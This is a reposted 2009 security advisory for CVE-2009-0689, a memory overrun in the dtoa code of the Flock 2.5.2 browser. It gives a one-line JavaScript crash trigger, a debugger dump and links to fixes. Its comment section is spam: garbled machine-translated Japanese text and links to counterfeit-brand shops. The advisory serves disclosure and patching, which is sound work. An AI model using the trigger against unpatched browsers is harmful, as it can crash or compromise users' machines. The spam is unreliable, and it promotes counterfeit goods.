Home » 2009 » December » 12 » Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
1:22 PM
Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
Hash: SHA1

[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- - Flock 2.5.2

Fixed in:
- - Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/75


- --- 0.Description ---
Flock is a web browser built on Mozilla.s Firefox codebase that specializes in providing social networking and Web 2.0 facilities built into its user interface. Flock v2.5 was officially released on May 19, 2009.

The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms.


- --- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.


- --- 2. Proof of Concept  (PoC) ---
- -----------------------
<script>
var a=0.;
</script>
- -----------------------

Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
  from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax            0x964619c7       -1773790777
ecx            0x2      2
edx            0x2      2
ebx            0x2      2
esp            0x20e7f0 0x20e7f0
ebp            0x1      0x1
esi            0x299d700        43636480
edi            0x299d701        43636481
eip            0x67c68740       0x67c68740 <js3250!JS_
DHashTableEnumerate+288>
eflags         0x210202 [ IF RF ID ]
cs             0x1b     27
ss             0x23     35
ds             0x23     35
Es             0x23     35
fs             0x3b     59
gs             0x0      0

(gdb) x/i 0x67c68740
0x67c68740 <js3250!JS_DHashTableEnumerate+288>:
   mov    0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7:     Cannot access memory at address 0x964619c7


- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - Mozilla Thunderbird
- - Mozilla Sunbird
- - Mozilla Camino
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
- - F-Lock

This list is not yet closed.


- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


- --- 6. Greets ---
Infospec p_e_a pi3


- --- 7. Contact ---
Email:
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksheuIACgkQpiCeOKaYa9a6kgCgkup7jH12XriVRt9ANPevyghu
9uwAoNwchC9esCuYpxHrWRPtkD77VYkg
=zyvz
-----END PGP SIGNATURE-----
Views: 4684 | Added by: b1zz4rd | Rating: 0.0/0
Total comments: 881 2 3 ... 8 9 »
88  
OyzIogWf http://www.i-oakley.com/ - オークリー ゴルフ MjxBanEz http://www.i-oakley.com/ HdzPbeNc http://www.monclerzone.com/ - モンクレー ダウン FjdZjqRe http://www.monclerzone.com/ VgbZjgAq http://www.bootstojapan.com/ - アグ オーストラリア メンズ UjxVilPe http://www.bootstojapan.com/ OilZrwBt http://www.beloveboots.com/ - UGG ムートンブーツ MofJqcVg http://www.beloveboots.com/ FszPodBl http://www.boots-senmonten.com/ - アグ ムートンブーツ IhsJkpYg http://www.boots-senmonten.com/ OhcOgbJx

87  
いくつかの欠席、しばらくの間、私の心の中で、オープンで楽しい言葉では表せないもどかしさのような身体の細孔。ちょうど約賢人、彼女は、彼は、窓の外を見てすることを見て "どうやって?"彼セージは、バック波面の流れを見てカップ手渡した"太陽から出て!"案の定、雨が上がった、太陽は冬の外に吹いたガラス窓は暖かいハローの層をキャストどんな賢人で全身の方向を逆にいたずら、輝いていた。

http://www.newchloe2012.com クロエ 財布
http://www.newchloe2012.com クロエ アウトレット
http://www.newchloe2012.com シーバイクロエ
http://www.newchloe2012.com クロエ
http://www.newchloe2012.com chloe バッグ
http://www.newchloe2012.com クロエ 長財布
クロエ 財布 : http://www.newchloe2012.com

86  
すぐに、家の中に甘い香りをぷんぷんと、カップを運ぶ賢者がやってきて、彼女の飲み物はたくさんの可能性がありますいくつかの場所手渡し辛味が、非常に暖かい味、不思議に思 っているシェンXiは、私は見た"シェンXiはどこに赤い水、鼻に来て、いくつかのスパイスの香り、カップそっと一口小さな口、問題は嘆いた、"香港ああ!すべてセージ、これは何ですか?"彼セージはベッドの端に座って見て彼女を見て判断、"黒砂糖、生姜、水、黒砂糖、暖かい、甘い、Rupi、気と血、脾臓、胃が痛み、血液の循環を減らして、あなただけの雨が降る、お茶を飲むのインフルエンザ。"

http://www.bvlgaritojp.com/ ブルガリ アウトレット
http://www.bvlgaritojp.com/ ブルガリ 財布
http://www.bvlgaritojp.com/ ブルガリ 指輪
http://www.bvlgaritojp.com/ ブルガリ ネックレス
http://www.bvlgaritojp.com/ レスブルガリ バッグ
http://www.bvlgaritojp.com/ ブルガリ 通販
ブルガリ アウトレット : http://www.bvlgaritojp.com/

85  
How do you teach history in your countries

84  
よく、私はあなたがバランス感覚を持っていることを知って、生きていないどのように、あなたを空想し、確かにそれはビンに行く、私は助けることができないこの忙しい後に上司 と非常に緊急、自身のアカウントです!"彼は賢人は電話を切った、、アンディ上司は彼がいわれのないバーストトラブルを送信公共の問題を考慮すること任せる前に、彼は心配していると感じていた日を覚えていない独自 の足枷をオフに歩いていない、それは忘れない方が良いです。

http://www.timberlandkutsu.com/ ティンバーランド アウトレット
http://www.timberlandkutsu.com/ ティンバーランド ブーツ
http://www.timberlandkutsu.com/ ティンバーランド
http://www.timberlandkutsu.com/ ブーツティンバーランド スニーカー
http://www.timberlandkutsu.com/ ティンバーランド 靴
http://www.timberlandkutsu.com/ Timberland ブーツ
ティンバーランド アウトレット : http://www.timberlandkutsu.com/

83  
あなたの故郷の周りでダンスの店をチェックアウトし、彼らが提供しているかを確認したい場合があります。彼らは何よりもまず、彼らはまた、ホルのために完全に適しており、結 婚式やプロムに着ていく服を非常に適しているであろう、いくつかの非常に生意気な靴を作るインチ踊らされるように設計されて靴を作っています。

http://www.coach-get.com/ コーチ バッグ
http://www.coach-get.com/ コーチ 財布
http://www.coach-get.com/ コーチ
http://www.coach-get.com/ コーチ 新作
http://www.coach-get.com/ コーチ アウトレット
コーチ バッグ: http://www.coach-get.com/

82  
哀れ、プルダウン鋸シェンXiを操縦する、アルコールで拭く私は針を被るしたくない...服を脱ぎ来て、横になって私に背中を"彼は、彼女の抗議に耳を傾けなかった"。"彼女は追随しなければならなかったし、静かに尋ねた、"すべての服ですか? "彼は賢人が彼女を見つめ、"もちろん、またはどのように効果的であること。"くらい話した後、シェンXiの少し赤い顔を見つけ、彼は説明するために急いで、"あなたは患者ですが、私は医者だけど..."

http://www.lvsuki.com/ コピーブランド
http://www.lvsuki.com/ ルイヴィトン偽物
http://www.lvsuki.com/ ヴィトンスーパーコピー
http://www.lvsuki.com/ ルイビトン
コピーブランド : http://www.lvsuki.com/

81  
"彼は髪をかま無血の唇の上に少し顔を見て、彼女の体をBanguo彼女が上に曲がっている場合、白、額に水滴を滴下厚い前髪、その後いくつかのフラッシュ内部の目、そして見 て、彼はパニック、丸まっ。サイレントの目が彼を見て、任意の賢者の服をつかんで、公差のヒントは無力ですが、彼女は彼の不随意を注ぐために、セージは彼女の最後の藁が何で あるか、重力の彼女の身体の中心を感じシェン西のスクラップは、ささやいた"痛み...痛み...痛みは我慢できない...

http://www.timberlandtojp.com/ テインバーランド ブーツ
http://www.timberlandtojp.com/ timberland 靴
http://www.timberlandtojp.com/ テインバーランド
http://www.timberlandtojp.com/ テインバーランド シューズ
http://www.timberlandtojp.com/ 靴 テインバーランド
テインバーランド ブーツ : http://www.timberlandtojp.com/

80  
小さな石を沈降させ、あなたがより少ないお金のためにお好みの精巧なリングを持つことができるときにダイヤモンドを入手しても意味がありません。あなたが花嫁の誕生石を含め たい場合は、それが可能な人工宝石を使って行うことができます。

http://www.raybanjp2012.com/ レイバン ウェイファーラー
http://www.raybanjp2012.com/ シューター
http://www.raybanjp2012.com/ レイバン サングラス
http://www.raybanjp2012.com/ レイバン サングラス偏光
http://www.raybanjp2012.com/ レイバン
http://www.raybanjp2012.com/ レイバン 店舗
シューター: http://www.raybanjp2012.com/

79  
小さな石を沈降させ、あなたがより少ないお金のためにお好みの精巧なリングを持つことができるときにダイヤモンドを入手しても意味がありません。あなたが花嫁の誕生石を含め たい場合は、それが可能な人工宝石を使って行うことができます。

http://www.raybanjp2012.com/ レイバン ウェイファーラー
http://www.raybanjp2012.com/ シューター
http://www.raybanjp2012.com/ レイバン サングラス
http://www.raybanjp2012.com/ レイバン サングラス偏光
http://www.raybanjp2012.com/ レイバン
http://www.raybanjp2012.com/ レイバン 店舗
シューター: http://www.raybanjp2012.com/

1-10 11-20 21-30 ... 71-80 81-88
Name *:
Email *:
Code *: